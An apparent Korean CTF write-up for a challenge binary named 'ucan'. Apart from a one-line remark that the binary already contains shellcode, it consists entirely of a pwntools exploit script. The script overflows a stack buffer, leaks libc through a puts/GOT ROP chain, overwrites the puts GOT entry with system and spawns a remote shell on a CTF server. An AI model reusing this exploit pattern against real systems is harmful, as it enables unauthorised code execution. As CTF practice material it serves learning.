사실 요문제는 이렇게 귀찮게 ROP를 하지 않아도 된다... ㅠㅠ 바이너리를 잘 살펴보면 쉘코드가 뙇 박혀있다..
from pwn import *
#s = process("./ucan",env={'LD_PRELOAD':'./libc'})
s = remote("kshgroup.kr",19192)
libc = ELF("./libc")
elf = ELF("./ucan")
#gdb.attach(s,'b *0x40073E')
pop_rdi = 0x004007b3
pop_rsi_r15 = 0x004007b1
pay = "A"*0x400
pay += "B"*8
pay += p64(pop_rdi)
pay += p64(elf.got['read'])
pay += p64(elf.plt['puts'])
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(elf.plt['read'])
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.got['puts'])
pay += p64(0)
pay += p64(elf.plt['read'])
pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(elf.plt['puts'])
s.send(pay)
s.recvuntil("Your name : ")
puts_libc = u64(s.recv(6)+"\x00\x00")
print "puts : " + hex(puts_libc)
libc_base = puts_libc - libc.symbols['read']
print "libc_base : " + hex(libc_base)
one_shot = libc_base + 0x10a38c
print "one_shot : " + hex(one_shot)
system = libc_base + libc.symbols['system']
print "system : " + hex(system)
s.send("/bin/sh\x00")
sleep(0.5)
s.send(p64(system))
s.interactive()
